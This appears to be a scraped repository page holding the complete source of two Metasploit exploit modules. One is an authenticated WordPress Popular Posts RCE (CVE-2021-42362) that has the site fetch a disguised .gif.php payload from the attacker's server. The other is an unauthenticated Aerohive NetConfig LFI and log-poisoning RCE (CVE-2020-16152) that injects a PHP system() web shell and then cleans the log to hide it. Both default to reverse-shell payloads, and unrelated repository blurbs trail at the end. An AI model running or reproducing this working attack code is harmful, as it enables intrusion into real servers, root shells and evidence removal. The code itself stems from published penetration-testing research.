Nate0634034090 / Nate158g M W N L P D A O E### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend
FaztWeb / Zod Restapi TutorialREST API Validation using Zod & Typescript
poplarjs / PoplarA powerful and customizable Rest API framework built on top of express, supports validations, sanitizers, api presenters e.g.
Luis-GA / CI KPICloud agnostic REST API to collect data from CI validations and retrieve results to enhance the CI observability
